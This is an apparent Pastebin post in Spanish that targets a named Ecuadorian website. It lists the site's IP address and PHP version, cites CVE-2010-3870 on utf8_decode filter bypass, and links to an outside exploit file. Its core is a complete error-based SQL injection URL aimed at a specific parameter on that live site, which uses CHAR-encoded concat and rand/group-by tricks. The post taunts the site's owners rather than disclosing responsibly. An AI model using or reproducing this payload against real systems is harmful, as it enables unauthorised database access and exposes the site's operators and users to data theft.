Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- WEB SERVER:evolucionarios.ec IP:108.166.85.168
- PAGINA VERCION:Version 5.3.3
- Vulnerabilidades conocidos de esta version Existen pocas pero tal vez sean de gran utilidad:
- ç
- Apache mod_cache y Solicitud mod_dav Negación Manejo de vulnerabilidad de los servicios
- Un Poco del concepto:
- La función utf8_decode en PHP 5.3.4 antes no controla correctamente no más corta de UTF-8 formato de codificación y subsecuencias mal formados en datos UTF-8, lo que hace que sea más fácil para los atacantes remotos evitar cross-site scripting (XSS) y SQL mecanismos de inyección de protección a través de una cuerda hecha a mano.
- Certificado:
- CVE-2010-3870
- bueno amigos de Evolucionarios pueden conocer un poco mas de este falla aca:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3870
- tambien tenemos fallas (SQL) o mas bien posibildiades
- https://evolucionarios.ec/evolucionarios/index.php?r=site/indiceSpec&id=-1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&crit=1
- EXPLOIT:
- http://downloads.securityfocus.com/vulnerabilities/exploits/49303-2.c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement